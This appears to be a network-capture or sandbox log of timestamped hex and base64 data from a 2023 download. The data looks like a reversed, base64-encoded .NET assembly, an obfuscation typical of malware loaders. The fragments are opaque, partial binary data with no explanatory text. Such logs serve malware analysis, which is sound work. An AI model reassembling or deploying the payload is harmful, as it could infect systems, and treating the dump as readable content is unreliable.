                                                                            2023-03-21 08:10:10 UTC576INData Raw: 62 61 30 47 4c 59 44 63 68 72 52 7a 38 44 35 62 75 7a 5a 30 4e 77 33 7a 30 50 2f 79 4e 4e 31 77 38 30 71 69 79 7a 75 57 59 4b 6e 6e 67 6a 68 31 4e 6a 61 2b 6c 73 33 35 4c 33 6c 6c 51 33 46 50 52 2b 6e 4c 57 65 71 75 77 57 72 38 42 48 4f 4b 39 75 36 72 4b 63 69 53 35 58 73 65 70 54 59 75 71 77 41 7a 4c 6e 72 48 6c 65 47 61 61 4e 43 32 58 67 4a 61 5a 47 58 34 72 77 42 4d 55 33 76 33 38 55 2b 50 58 45 65 33 50 36 57 54 32 59 6b 2b 33 52 65 56 2b 4e 59 51 37 4d 45 38 65 6e 4f 5a 49 69 58 70 43 6a 6d 74 30 54 7a 56 4a 55 4a 46 2b 65 67 4a 51 74 54 65 37 64 77 4a 4e 59 7a 48 38 72 4a 49 68 67 71 74 42 38 68 39 6b 42 48 35 35 78 4d 37 61 33 78 61 2f 61 38 65 45 31 2f 6c 41 66 39 64 74 59 38 66 34 4e 54 45 47 67 69 52 6c 46 4e 61 41 58 56 43 2b 55 7a 2b 6d 31 55
                                                                            Data Ascii: ba0GLYDchrRz8D5buzZ0Nw3z0P/yNN1w80qiyzuWYKnngjh1Nja+ls35L3llQ3FPR+nLWequwWr8BHOK9u6rKciS5XsepTYuqwAzLnrHleGaaNC2XgJaZGX4rwBMU3v38U+PXEe3P6WT2Yk+3ReV+NYQ7ME8enOZIiXpCjmt0TzVJUJF+egJQtTe7dwJNYzH8rJIhgqtB8h9kBH55xM7a3xa/a8eE1/lAf9dtY8f4NTEGgiRlFNaAXVC+Uz+m1U
                                                                            2023-03-21 08:10:10 UTC592INData Raw: 50 76 4d 7a 4b 6d 4c 65 35 6d 68 51 78 54 4e 67 37 65 76 70 6d 62 78 4a 6e 70 6c 72 72 35 6e 6c 4b 48 57 55 2f 73 65 78 6d 34 54 31 34 6a 4b 44 39 46 78 56 2f 4e 74 44 39 4d 47 6d 4c 39 70 33 6a 78 6b 6f 63 5a 50 69 6d 6c 39 68 33 37 35 62 38 54 47 38 6b 5a 68 2b 79 72 50 59 54 78 33 79 2b 79 6a 50 70 65 5a 6c 2b 68 4b 76 50 4c 37 53 79 77 34 2f 44 73 2b 79 74 78 35 2f 57 4d 4e 79 7a 53 55 33 6e 2b 76 6f 74 64 6d 45 73 61 53 2b 75 74 71 65 31 74 4a 68 2b 69 43 59 46 30 33 4c 39 77 77 62 6b 72 74 36 50 76 79 59 30 50 31 38 69 43 58 61 48 70 78 79 6a 57 78 47 74 32 53 4e 4d 63 69 78 56 34 46 54 6f 51 55 6a 7a 68 6b 43 63 38 39 70 2f 4b 76 4a 56 65 44 36 38 70 4e 69 50 35 4b 65 33 2f 54 79 78 34 4c 6f 61 78 34 47 72 4a 42 6a 64 6e 4c 61 49 32 47 35 6a 2b 6e
                                                                            Data Ascii: PvMzKmLe5mhQxTNg7evpmbxJnplrr5nlKHWU/sexm4T14jKD9FxV/NtD9MGmL9p3jxkocZPiml9h375b8TG8kZh+yrPYTx3y+yjPpeZl+hKvPL7Syw4/Ds+ytx5/WMNyzSU3n+votdmEsaS+utqe1tJh+iCYF03L9wwbkrt6PvyY0P18iCXaHpxyjWxGt2SNMcixV4FToQUjzhkCc89p/KvJVeD68pNiP5Ke3/Tyx4Loax4GrJBjdnLaI2G5j+n
                                                                            2023-03-21 08:10:10 UTC608INData Raw: 73 6f 2f 2b 4c 63 42 70 33 36 6b 78 46 69 35 39 6f 51 59 55 50 66 6b 5a 38 36 33 67 36 59 47 55 36 56 38 4a 4b 36 6c 7a 46 6c 48 48 6a 32 36 4b 44 6e 75 4a 38 75 4a 4e 31 58 54 31 74 61 77 37 54 4e 55 63 71 76 39 71 73 52 62 62 6e 35 66 41 79 67 6c 6c 54 4b 79 66 75 46 32 37 76 52 43 47 4d 61 55 68 4d 4b 7a 2f 47 6f 41 2f 48 4a 56 70 58 67 55 6a 73 72 30 45 4c 54 55 41 63 62 4b 66 2b 41 6c 47 52 48 78 51 38 51 64 33 36 42 34 68 43 35 56 48 70 42 56 69 36 58 61 44 6e 68 37 4b 52 6b 48 56 77 36 68 74 35 35 4a 56 41 48 66 68 71 45 78 77 55 33 6e 4d 63 61 4d 63 49 4d 71 66 68 72 55 55 6c 76 30 35 35 41 74 64 43 70 57 32 4f 64 70 45 63 71 79 4d 53 2b 4a 6a 4d 45 4d 42 6f 44 78 57 6e 39 53 71 65 68 6a 58 4a 77 36 6a 46 6e 57 67 53 47 59 4a 44 43 33 43 38 57 57
                                                                            Data Ascii: so/+LcBp36kxFi59oQYUPfkZ863g6YGU6V8JK6lzFlHHj26KDnuJ8uJN1XT1taw7TNUcqv9qsRbbn5fAygllTKyfuF27vRCGMaUhMKz/GoA/HJVpXgUjsr0ELTUAcbKf+AlGRHxQ8Qd36B4hC5VHpBVi6XaDnh7KRkHVw6ht55JVAHfhqExwU3nMcaMcIMqfhrUUlv055AtdCpW2OdpEcqyMS+JjMEMBoDxWn9SqehjXJw6jFnWgSGYJDC3C8WW
                                                                            2023-03-21 08:10:10 UTC624INData Raw: 65 46 49 4e 55 50 35 38 38 6c 4f 35 74 55 33 35 78 49 4b 64 56 4d 53 44 6a 52 2f 73 36 52 72 69 54 6e 67 64 71 53 49 50 6a 61 4e 31 42 70 54 53 76 4b 67 36 37 30 68 4e 50 32 6d 36 65 54 33 54 38 36 65 43 79 4c 4f 79 6d 36 53 2b 32 2b 39 45 63 48 6b 57 55 52 65 5a 65 31 79 7a 73 59 79 64 49 72 52 49 70 38 65 4d 50 77 6f 65 62 72 68 4f 54 45 38 56 4e 72 59 49 34 62 38 36 65 2b 4e 76 7a 6d 67 63 2f 61 4e 6d 2f 36 61 49 33 69 30 6c 6c 44 71 61 6c 59 71 53 58 2f 70 45 34 57 41 6f 42 51 42 50 5a 74 2f 58 48 58 2f 5a 4f 30 62 48 58 6d 31 4b 58 69 68 4c 6d 67 32 6b 34 45 65 50 45 56 2b 77 34 51 78 35 49 4a 61 5a 67 39 37 57 6a 5a 65 42 4e 76 38 53 35 2b 58 67 77 2f 41 39 70 64 4c 72 57 4c 6b 44 64 54 70 50 65 39 39 6c 33 70 44 30 62 64 70 58 55 66 35 64 69 5a 34
                                                                            Data Ascii: eFINUP588lO5tU35xIKdVMSDjR/s6RriTngdqSIPjaN1BpTSvKg670hNP2m6eT3T86eCyLOym6S+2+9EcHkWUReZe1yzsYydIrRIp8eMPwoebrhOTE8VNrYI4b86e+Nvzmgc/aNm/6aI3i0llDqalYqSX/pE4WAoBQBPZt/XHX/ZO0bHXm1KXihLmg2k4EePEV+w4Qx5IJaZg97WjZeBNv8S5+Xgw/A9pdLrWLkDdTpPe99l3pD0bdpXUf5diZ4
                                                                            2023-03-21 08:10:10 UTC640INData Raw: 68 62 36 4c 47 72 62 76 39 6b 36 59 52 72 36 74 35 56 58 38 6c 6f 2b 6c 49 6b 6b 75 51 47 30 68 56 7a 32 67 79 4c 5a 41 4a 50 58 39 52 4b 71 65 4e 31 42 6b 7a 39 6f 30 41 33 62 51 33 46 68 6c 41 6c 65 55 75 4e 33 63 5a 4e 2f 31 2f 35 57 48 6a 6f 56 71 55 72 50 70 55 45 71 50 51 4a 4e 33 67 69 79 38 47 6b 30 43 42 64 4a 43 6f 56 34 6f 46 59 45 52 34 53 62 6a 45 2f 2b 62 33 34 73 6c 68 58 66 41 4f 43 54 6c 30 32 50 75 56 35 6c 74 4e 59 58 76 4d 51 4b 73 2b 49 6d 70 61 69 70 33 45 57 68 36 4c 44 43 46 77 52 55 50 5a 38 5a 6b 4a 4e 71 61 65 4e 4f 36 52 77 47 39 79 63 2f 4b 68 54 35 75 4d 6b 46 6f 73 30 76 39 6d 2f 6f 44 47 75 76 2f 33 72 42 2b 63 59 4f 56 51 74 77 31 4e 4f 61 65 46 56 74 52 78 72 30 73 74 4e 48 53 39 58 2f 66 66 33 5a 5a 4d 52 59 37 30 57 53
                                                                            Data Ascii: hb6LGrbv9k6YRr6t5VX8lo+lIkkuQG0hVz2gyLZAJPX9RKqeN1Bkz9o0A3bQ3FhlAleUuN3cZN/1/5WHjoVqUrPpUEqPQJN3giy8Gk0CBdJCoV4oFYER4SbjE/+b34slhXfAOCTl02PuV5ltNYXvMQKs+Impaip3EWh6LDCFwRUPZ8ZkJNqaeNO6RwG9yc/KhT5uMkFos0v9m/oDGuv/3rB+cYOVQtw1NOaeFVtRxr0stNHS9X/ff3ZZMRY70WS
                                                                            2023-03-21 08:10:10 UTC656INData Raw: 76 55 64 6d 74 4b 49 72 54 70 36 51 6a 41 6e 66 7a 6c 70 75 50 4b 30 51 48 69 74 2f 4e 77 62 46 71 56 57 4d 6f 54 32 4f 72 34 6f 79 69 4a 62 4a 75 51 55 4b 6a 55 68 54 30 33 2b 38 68 4b 71 4f 33 37 73 44 64 71 51 75 4e 54 35 55 4c 70 31 61 52 56 4a 67 79 66 2b 2b 6d 32 4e 65 49 6b 37 4c 4a 70 62 43 70 61 79 4e 61 72 71 6c 75 74 76 52 36 5a 33 57 41 75 61 78 54 79 4a 31 66 4a 66 64 36 47 31 50 5a 63 54 55 37 73 6f 37 51 61 4a 48 54 72 30 75 52 31 78 61 55 53 32 78 44 43 43 59 53 67 77 42 65 4a 62 63 49 36 71 39 72 7a 45 39 62 30 68 76 64 68 75 37 41 39 67 6e 45 64 75 4f 69 56 43 64 2b 61 35 6e 61 36 36 7a 4f 71 30 4d 59 32 31 2b 41 36 52 58 78 68 46 50 44 69 59 49 4b 32 35 39 4e 63 6e 57 64 6f 38 68 64 6b 71 33 42 31 30 5a 37 45 70 42 47 67 49 5a 64 2b 61
                                                                            Data Ascii: vUdmtKIrTp6QjAnfzlpuPK0QHit/NwbFqVWMoT2Or4oyiJbJuQUKjUhT03+8hKqO37sDdqQuNT5ULp1aRVJgyf++m2NeIk7LJpbCpayNarqlutvR6Z3WAuaxTyJ1fJfd6G1PZcTU7so7QaJHTr0uR1xaUS2xDCCYSgwBeJbcI6q9rzE9b0hvdhu7A9gnEduOiVCd+a5na66zOq0MY21+A6RXxhFPDiYIK259NcnWdo8hdkq3B10Z7EpBGgIZd+a
                                                                            2023-03-21 08:10:10 UTC672INData Raw: 59 79 41 41 41 47 53 67 41 41 41 5a 47 56 30 59 57 52 77 56 58 64 76 55 67 6f 41 41 51 38 41 41 44 6b 7a 4d 57 5a 6d 4e 44 52 6b 4d 6d 4e 69 4e 7a 4d 35 59 6d 51 39 62 6d 56 72 62 31 52 35 5a 55 74 6a 61 57 78 69 64 56 41 67 4c 47 78 68 63 6e 52 31 5a 57 34 39 5a 58 4a 31 64 47 78 31 51 79 41 73 4d 43 34 32 4d 54 45 75 4d 43 34 78 50 57 35 76 61 58 4e 79 5a 56 59 67 4c 48 4a 6c 62 6d 64 70 63 32 56 45 4c 6d 56 30 61 55 78 52 55 79 41 73 62 57 56 30 53 58 68 76 59 6d 78 76 62 31 52 79 5a 58 52 77 59 57 52 42 59 58 52 68 52 47 56 30 61 55 78 52 55 79 35 79 5a 57 35 6e 61 58 4e 6c 52 43 35 6c 64 47 6c 4d 55 56 4f 43 67 41 41 42 69 49 41 41 41 48 4e 6e 59 57 78 47 49 47 52 6c 63 6d 46 6f 55 79 42 76 54 67 38 41 41 52 51 41 41 48 4e 6e 59 57 78 47 49 48 52 73
                                                                            Data Ascii: YyAAAGSgAAAZGV0YWRwVXdvUgoAAQ8AADkzMWZmNDRkMmNiNzM5YmQ9bmVrb1R5ZUtjaWxidVAgLGxhcnR1ZW49ZXJ1dGx1QyAsMC42MTEuMC4xPW5vaXNyZVYgLHJlbmdpc2VELmV0aUxRUyAsbWV0SXhvYmxvb1RyZXRwYWRBYXRhRGV0aUxRUy5yZW5naXNlRC5ldGlMUVOCgAABiIAAAHNnYWxGIGRlcmFoUyBvTg8AARQAAHNnYWxGIHRs
                                                                            2023-03-21 08:10:10 UTC688INData Raw: 65 43 43 45 67 67 49 34 49 49 53 48 49 4d 53 48 42 79 44 45 67 4c 56 67 68 45 56 41 75 43 43 45 68 79 44 45 67 4c 46 67 68 49 56 44 77 64 52 41 72 69 42 45 61 43 42 45 67 49 44 41 41 72 67 67 68 49 63 67 78 49 43 78 59 49 53 46 51 73 63 48 49 4d 53 41 74 57 43 45 52 55 4a 48 42 79 44 45 67 4c 56 67 68 45 56 41 65 47 43 45 68 55 4f 48 42 79 44 45 67 4c 56 67 68 45 56 41 57 57 42 45 68 55 4f 48 42 79 44 45 67 4c 56 67 68 45 56 41 65 47 43 45 68 58 67 67 68 49 63 67 78 49 63 48 49 4d 53 41 74 57 43 45 52 58 67 67 68 49 63 67 78 49 43 78 59 49 53 46 51 55 48 4b 72 69 42 45 61 43 42 45 75 43 43 45 68 79 44 45 67 4c 46 67 68 49 56 41 67 41 54 34 49 49 53 45 42 79 44 45 67 49 43 41 41 6f 63 48 49 4d 53 41 73 57 43 45 68 55 4a 51 59 45 53 43 42 77 44 42 77 63 63
                                                                            Data Ascii: eCCEggI4IISHIMSHByDEgLVghEVAuCCEhyDEgLFghIVDwdRAriBEaCBEgIDAArgghIcgxICxYISFQscHIMSAtWCERUJHByDEgLVghEVAeGCEhUOHByDEgLVghEVAWWBEhUOHByDEgLVghEVAeGCEhXgghIcgxIcHIMSAtWCERXgghIcgxICxYISFQUHKriBEaCBEuCCEhyDEgLFghIVAgAT4IISEByDEgICAAocHIMSAsWCEhUJQYESCBwDBwcc
                                                                            2023-03-21 08:10:10 UTC704INData Raw: 41 41 32 41 44 49 41 4e 77 41 35 41 47 49 41 4f 41 41 35 41 44 59 41 5a 51 42 6b 41 44 41 41 4e 77 42 69 41 44 63 41 4f 51 42 6d 41 44 4d 41 4f 51 42 6c 41 44 4d 41 5a 67 42 6d 41 47 45 41 4d 51 41 78 41 44 51 41 5a 51 41 35 41 44 49 41 4e 41 41 35 41 44 49 41 4f 41 42 69 41 47 55 41 4e 51 41 33 41 44 51 41 5a 67 41 33 41 44 6b 41 4f 51 41 32 41 44 55 41 4f 51 41 34 41 44 45 41 4e 41 41 33 41 44 49 41 4e 77 41 30 41 44 51 41 4f 41 42 6b 41 44 55 41 5a 67 42 6d 41 47 51 41 5a 41 41 78 41 44 49 41 4e 67 42 69 41 44 45 41 5a 51 41 30 41 47 4d 41 4e 77 41 34 41 44 59 41 4e 51 42 6c 41 47 51 41 4f 41 41 34 41 44 49 41 59 51 41 31 41 44 41 41 4d 41 41 77 41 44 45 41 4d 41 41 77 41 44 41 41 4d 51 41 77 41 44 41 41 4d 41 41 77 41 44 41 41 4e 41 41 77 41 44 41 41
                                                                            Data Ascii: AA2ADIANwA5AGIAOAA5ADYAZQBkADAANwBiADcAOQBmADMAOQBlADMAZgBmAGEAMQAxADQAZQA5ADIANAA5ADIAOABiAGUANQA3ADQAZgA3ADkAOQA2ADUAOQA4ADEANAA3ADIANwA0ADQAOABkADUAZgBmAGQAZAAxADIANgBiADEAZQA0AGMANwA4ADYANQBlAGQAOAA4ADIAYQA1ADAAMAAwADEAMAAwADAAMQAwADAAMAAwADAANAAwADAA
                                                                            2023-03-21 08:10:10 UTC720INData Raw: 51 42 79 41 47 4d 41 49 41 42 7a 41 47 45 41 64 77 41 67 41 48 49 41 62 77 42 7a 41 48 49 41 64 51 42 6a 41 43 41 41 5a 41 42 6c 41 47 63 41 59 51 42 75 41 47 45 41 62 51 41 67 41 47 38 41 62 6a 73 41 41 47 34 41 62 77 42 70 41 48 51 41 59 77 42 6c 41 47 34 41 62 67 42 76 41 47 4d 41 49 41 42 6b 41 47 6b 41 62 41 42 68 41 48 59 41 62 67 42 70 4a 51 41 41 64 41 42 75 41 47 55 41 62 51 42 6c 41 48 51 41 59 51 42 30 41 48 4d 41 49 41 42 4d 41 46 45 41 55 77 41 67 41 47 51 41 61 51 42 73 41 47 45 41 64 67 42 75 41 47 6b 72 41 41 42 6c 41 47 77 41 5a 41 42 75 41 47 45 41 61 41 41 67 41 47 51 41 61 51 42 73 41 47 45 41 64 67 42 75 41 47 6b 41 49 41 42 7a 41 47 45 41 61 41 41 67 41 47 34 41 62 77 42 70 41 48 51 41 59 77 42 6c 41 47 34 41 62 67 42 76 41 47 4d 37
                                                                            Data Ascii: QByAGMAIABzAGEAdwAgAHIAbwBzAHIAdQBjACAAZABlAGcAYQBuAGEAbQAgAG8AbjsAAG4AbwBpAHQAYwBlAG4AbgBvAGMAIABkAGkAbABhAHYAbgBpJQAAdABuAGUAbQBlAHQAYQB0AHMAIABMAFEAUwAgAGQAaQBsAGEAdgBuAGkrAABlAGwAZABuAGEAaAAgAGQAaQBsAGEAdgBuAGkAIABzAGEAaAAgAG4AbwBpAHQAYwBlAG4AbgBvAGM7
                                                                            2023-03-21 08:10:10 UTC736INData Raw: 47 55 41 64 67 42 7a 41 47 59 41 64 67 42 77 41 47 6b 41 65 68 73 41 41 48 4d 41 63 67 42 6c 41 47 63 41 5a 77 42 70 41 48 49 41 64 41 41 67 41 47 55 41 64 67 42 70 41 48 4d 41 63 67 42 31 41 47 4d 41 5a 51 42 79 4a 51 41 41 63 77 42 35 41 47 55 41 61 77 41 67 41 47 34 41 5a 77 42 70 41 47 55 41 63 67 42 76 41 47 59 5a 41 41 42 6c 41 47 30 41 59 51 42 75 41 48 4d 41 5a 67 42 32 44 77 41 41 5a 51 42 74 41 47 45 41 62 67 42 6c 41 48 41 41 65 51 42 30 41 48 51 41 62 41 42 31 41 47 45 41 5a 67 42 6c 41 47 51 66 41 41 42 6c 41 48 41 41 65 51 42 30 41 47 49 41 5a 41 42 30 41 47 77 41 64 51 42 68 41 47 59 41 5a 51 42 6b 47 77 41 41 62 41 42 6c 41 48 59 41 5a 51 42 73 41 47 34 41 62 77 42 70 41 48 51 41 59 51 42 73 41 47 38 41 63 77 42 70 41 43 41 41 64 41 42 73
                                                                            Data Ascii: GUAdgBzAGYAdgBwAGkAehsAAHMAcgBlAGcAZwBpAHIAdAAgAGUAdgBpAHMAcgB1AGMAZQByJQAAcwB5AGUAawAgAG4AZwBpAGUAcgBvAGYZAABlAG0AYQBuAHMAZgB2DwAAZQBtAGEAbgBlAHAAeQB0AHQAbAB1AGEAZgBlAGQfAABlAHAAeQB0AGIAZAB0AGwAdQBhAGYAZQBkGwAAbABlAHYAZQBsAG4AbwBpAHQAYQBsAG8AcwBpACAAdABs
                                                                            2023-03-21 08:10:10 UTC752INData Raw: 67 42 76 41 47 4d 41 49 41 42 6e 41 47 34 41 61 51 42 79 41 48 51 41 63 31 63 41 41 48 30 41 4d 67 42 34 41 44 6f 41 4d 41 42 37 44 51 41 41 4c 67 42 75 41 47 38 41 61 51 42 30 41 47 4d 41 5a 51 42 75 41 47 34 41 62 77 42 6a 41 43 41 41 5a 51 42 7a 41 47 45 41 59 67 42 68 41 48 51 41 59 51 42 6b 41 43 41 41 63 77 42 70 41 47 67 41 64 41 41 67 41 48 49 41 62 77 42 6d 41 43 41 41 5a 41 42 6c 41 47 77 41 59 67 42 68 41 48 4d 41 61 51 42 6b 41 43 41 41 63 77 42 70 41 43 41 41 63 77 42 6c 41 47 77 41 64 51 42 6b 41 47 38 41 62 51 41 67 41 47 63 41 62 67 42 70 41 48 51 41 59 51 42 6c 41 48 49 41 51 33 55 41 41 43 34 41 63 77 42 6c 41 47 77 41 64 51 42 6b 41 47 38 41 62 51 41 67 41 47 63 41 62 67 42 70 41 48 51 41 59 51 42 6c 41 48 49 41 59 77 41 67 41 48 49 41
                                                                            Data Ascii: gBvAGMAIABnAG4AaQByAHQAc1cAAH0AMgB4ADoAMAB7DQAALgBuAG8AaQB0AGMAZQBuAG4AbwBjACAAZQBzAGEAYgBhAHQAYQBkACAAcwBpAGgAdAAgAHIAbwBmACAAZABlAGwAYgBhAHMAaQBkACAAcwBpACAAcwBlAGwAdQBkAG8AbQAgAGcAbgBpAHQAYQBlAHIAQ3UAAC4AcwBlAGwAdQBkAG8AbQAgAGcAbgBpAHQAYQBlAHIAYwAgAHIA
                                                                            2023-03-21 08:10:10 UTC768INData Raw: 67 38 41 41 45 55 41 52 77 42 42 41 45 30 41 53 51 73 41 41 46 49 41 51 51 42 49 41 45 4d 4a 41 41 41 34 41 46 49 41 52 51 42 48 41 45 55 41 56 41 42 4f 41 45 6b 52 41 41 42 43 41 45 38 41 54 41 42 43 43 51 41 41 4e 41 41 32 41 46 51 41 54 67 42 4a 41 46 55 4e 41 41 42 5a 41 45 4d 41 54 67 42 46 41 46 49 41 55 67 42 56 41 45 4d 52 41 41 42 55 41 46 67 41 52 51 42 55 41 45 77 41 51 51 42 4e 41 45 6b 41 51 77 42 46 41 45 51 58 41 41 42 46 41 45 30 41 53 51 42 55 41 45 55 41 56 41 42 42 41 45 51 52 41 41 42 45 41 45 6b 41 56 51 42 48 43 51 41 41 55 67 42 42 41 45 67 41 51 77 42 53 41 45 45 41 56 67 42 4f 45 51 41 41 56 41 42 4f 41 45 6b 41 54 51 42 56 41 45 6b 41 52 41 42 46 41 45 30 54 41 41 42 5a 41 46 49 41 51 51 42 4f 41 45 6b 41 51 67 42 53 41 45 45 41
                                                                            Data Ascii: g8AAEUARwBBAE0ASQsAAFIAQQBIAEMJAAA4AFIARQBHAEUAVABOAEkRAABCAE8ATABCCQAANAA2AFQATgBJAFUNAABZAEMATgBFAFIAUgBVAEMRAABUAFgARQBUAEwAQQBNAEkAQwBFAEQXAABFAE0ASQBUAEUAVABBAEQRAABEAEkAVQBHCQAAUgBBAEgAQwBSAEEAVgBOEQAAVABOAEkATQBVAEkARABFAE0TAABZAFIAQQBOAEkAQgBSAEEA
                                                                            2023-03-21 08:10:10 UTC784INData Raw: 47 46 76 63 6b 4a 6c 64 47 46 53 41 47 56 7a 62 6d 39 77 5a 56 4a 6c 64 47 46 6b 61 57 78 68 56 67 42 79 62 33 52 68 63 6d 56 74 64 57 35 46 64 47 56 48 4c 6d 56 73 59 6d 46 79 5a 57 31 31 62 6b 56 4a 4c 6e 4e 75 62 32 6c 30 59 32 56 73 62 47 39 44 4c 6d 31 6c 64 48 4e 35 55 77 42 79 5a 58 52 7a 59 57 4e 6b 59 57 39 79 51 6d 68 6a 64 47 46 51 41 48 4e 7a 5a 57 4e 76 63 6c 42 74 5a 58 52 7a 65 56 4e 66 41 48 4e 7a 5a 57 4e 76 63 6c 42 30 62 6d 56 70 62 45 4e 66 62 51 42 7a 63 32 56 6a 62 33 4a 51 63 6d 56 31 63 33 4e 70 41 47 56 30 59 58 52 54 64 47 4e 6c 62 47 78 76 51 77 42 6c 64 47 46 30 55 33 52 75 64 57 39 44 41 47 56 30 59 58 52 54 5a 58 4a 68 63 47 31 76 51 77 42 6c 64 47 46 30 55 33 52 6a 5a 57 78 6c 55 77 42 6c 63 32 35 76 63 47 56 53 5a 58 52 6c
                                                                            Data Ascii: GFvckJldGFSAGVzbm9wZVJldGFkaWxhVgByb3RhcmVtdW5FdGVHLmVsYmFyZW11bkVJLnNub2l0Y2VsbG9DLm1ldHN5UwByZXRzYWNkYW9yQmhjdGFQAHNzZWNvclBtZXRzeVNfAHNzZWNvclB0bmVpbENfbQBzc2Vjb3JQcmV1c3NpAGV0YXRTdGNlbGxvQwBldGF0U3RudW9DAGV0YXRTZXJhcG1vQwBldGF0U3RjZWxlUwBlc25vcGVSZXRl
                                                                            2023-03-21 08:10:10 UTC800INData Raw: 6d 56 34 5a 57 52 75 53 58 52 79 5a 58 5a 6c 55 67 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 52 31 63 47 31 76 51 77 42 79 5a 58 68 6c 5a 47 35 4a 5a 57 52 31 62 47 4e 34 52 51 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 5a 76 54 51 42 6c 62 57 46 4f 5a 47 56 70 5a 6d 6c 73 59 58 56 52 5a 58 52 68 5a 58 4a 44 41 48 4a 6c 65 47 56 6b 62 6b 6c 6c 61 32 46 33 51 51 42 79 5a 58 68 6c 5a 47 35 4a 62 47 56 6a 62 6d 46 44 41 48 4a 6c 65 47 56 6b 62 6b 6c 77 64 58 52 6c 55 77 42 79 5a 58 68 6c 5a 47 35 4a 5a 58 4a 68 63 47 56 79 55 41 42 79 5a 58 68 6c 5a 47 35 4a 64 48 42 31 63 6e 4a 6c 64 47 35 4a 41 48 4a 6c 65 47 56 6b 62 6b 6c 30 61 58 4e 70 56 67 42 79 5a 58 68 6c 5a 47 35 4a 62 6d 6c 6e 62 30 77 41 63 6d 56 34 5a 57 52 75 53 58 52 7a 61 55 77 41 63 6d 56 34 5a 57 52 75
                                                                            Data Ascii: mV4ZWRuSXRyZXZlUgByZXhlZG5JZXR1cG1vQwByZXhlZG5JZWR1bGN4RQByZXhlZG5JZXZvTQBlbWFOZGVpZmlsYXVRZXRhZXJDAHJleGVkbklla2F3QQByZXhlZG5JbGVjbmFDAHJleGVkbklwdXRlUwByZXhlZG5JZXJhcGVyUAByZXhlZG5JdHB1cnJldG5JAHJleGVkbkl0aXNpVgByZXhlZG5Jbmlnb0wAcmV4ZWRuSXRzaUwAcmV4ZWRu
                                                                            2023-03-21 08:10:10 UTC816INData Raw: 47 31 76 51 77 42 73 5a 57 52 76 54 58 52 7a 5a 58 56 78 5a 58 49 41 62 47 56 6b 62 30 31 73 59 57 4a 76 62 45 64 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 63 48 42 68 62 51 42 73 5a 57 52 76 54 57 35 76 61 58 52 70 62 6d 6c 6d 5a 57 51 41 62 47 56 6b 62 30 31 75 62 32 6c 30 59 57 4e 70 64 47 35 6c 61 48 52 31 51 56 39 74 41 47 78 6c 5a 47 39 4e 64 47 4e 31 5a 47 39 79 55 46 38 41 62 47 56 6b 62 30 31 6b 62 47 56 70 5a 67 42 73 5a 57 52 76 54 57 35 76 61 58 52 6a 5a 57 35 75 62 30 4e 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 61 57 5a 70 64 47 35 6c 5a 45 6c 66 62 51 42 73 5a 57 52 76 54 57 39 6e 62 45 46 66 41 47 78 6c 5a 47 39 4e 63 33 52 7a 5a 56 52 66 41 47 78 6c 5a 47 39 4e 5a 58 56 73 59 56 5a 66 62 51 42 73 5a 57 52 76 54 58 4a 6c 61 48 4e 70 62 47 4a 31
                                                                            Data Ascii: G1vQwBsZWRvTXRzZXVxZXIAbGVkb01sYWJvbEdfbQBsZWRvTXJlcHBhbQBsZWRvTW5vaXRpbmlmZWQAbGVkb01ub2l0YWNpdG5laHR1QV9tAGxlZG9NdGN1ZG9yUF8AbGVkb01kbGVpZgBsZWRvTW5vaXRjZW5ub0NfbQBsZWRvTXJlaWZpdG5lZElfbQBsZWRvTW9nbEFfAGxlZG9Nc3RzZVRfAGxlZG9NZXVsYVZfbQBsZWRvTXJlaHNpbGJ1
                                                                            2023-03-21 08:10:10 UTC832INData Raw: 57 4e 6c 63 46 4e 79 5a 57 52 70 64 6d 39 79 55 41 42 75 62 32 6c 7a 63 32 56 79 63 48 68 46 63 30 6b 41 5a 57 31 68 54 6d 64 76 62 47 46 30 59 55 4e 6c 63 32 46 43 41 47 35 76 61 58 4e 79 5a 56 5a 33 62 31 4a 7a 53 51 42 75 5a 57 52 6b 61 55 68 7a 53 51 42 6c 63 48 6c 55 59 58 52 68 52 41 42 6b 5a 58 4e 68 61 57 78 42 63 30 6b 41 5a 32 35 76 54 48 4e 4a 41 47 35 76 61 58 52 6a 5a 57 78 73 62 30 4e 35 5a 55 73 41 62 47 56 6b 62 30 31 30 63 6d 56 7a 62 6b 6b 41 4d 32 35 76 61 58 52 6a 5a 57 35 75 62 32 4d 41 4d 6d 56 6a 62 6d 56 79 5a 57 5a 6c 63 67 42 79 61 57 52 66 62 32 34 41 62 47 56 6b 62 30 31 30 5a 58 4e 6c 55 67 42 75 62 32 6c 30 63 47 56 6a 65 45 56 6c 5a 32 35 68 55 6d 5a 50 64 48 56 50 65 47 56 6b 62 6b 6b 41 62 47 46 75 61 57 52 79 54 33 52 6c
                                                                            Data Ascii: WNlcFNyZWRpdm9yUABub2lzc2VycHhFc0kAZW1hTmdvbGF0YUNlc2FCAG5vaXNyZVZ3b1JzSQBuZWRkaUhzSQBlcHlUYXRhRABkZXNhaWxBc0kAZ25vTHNJAG5vaXRjZWxsb0N5ZUsAbGVkb010cmVzbkkAM25vaXRjZW5ub2MAMmVjbmVyZWZlcgByaWRfb24AbGVkb010ZXNlUgBub2l0cGVjeEVlZ25hUmZPdHVPeGVkbkkAbGFuaWRyT3Rl
                                                                            2023-03-21 08:10:10 UTC848INData Raw: 47 56 6e 62 6d 46 6f 51 32 56 30 59 58 52 54 58 32 52 6b 59 51 42 30 5a 58 4e 7a 59 58 52 70 59 32 6c 73 63 48 68 6c 41 48 4a 6c 64 48 52 6c 55 32 35 31 55 67 42 79 5a 58 52 30 5a 56 4e 30 63 32 39 51 41 48 4a 6c 64 48 52 6c 55 33 4a 6c 64 48 4e 70 5a 32 56 53 41 48 4a 6c 64 48 52 6c 55 32 56 30 59 57 52 70 62 47 46 57 41 48 4a 6c 64 48 52 6c 55 32 56 6b 64 57 78 6a 62 6b 6b 41 62 47 56 6b 62 30 31 30 5a 58 4e 7a 51 51 42 73 5a 57 52 76 54 57 56 6e 59 57 35 68 54 51 42 79 5a 58 52 30 5a 56 4e 30 59 32 56 73 5a 6d 56 53 41 48 4a 6c 64 48 52 6c 55 33 52 75 64 57 39 44 41 48 4a 6c 64 48 52 6c 55 33 52 31 62 32 64 76 54 41 42 79 5a 58 52 30 5a 56 4e 30 61 57 35 4a 41 48 4a 6c 64 48 52 6c 55 33 42 76 55 41 42 79 5a 58 52 30 5a 56 4e 6c 62 47 4a 68 63 32 6c 45
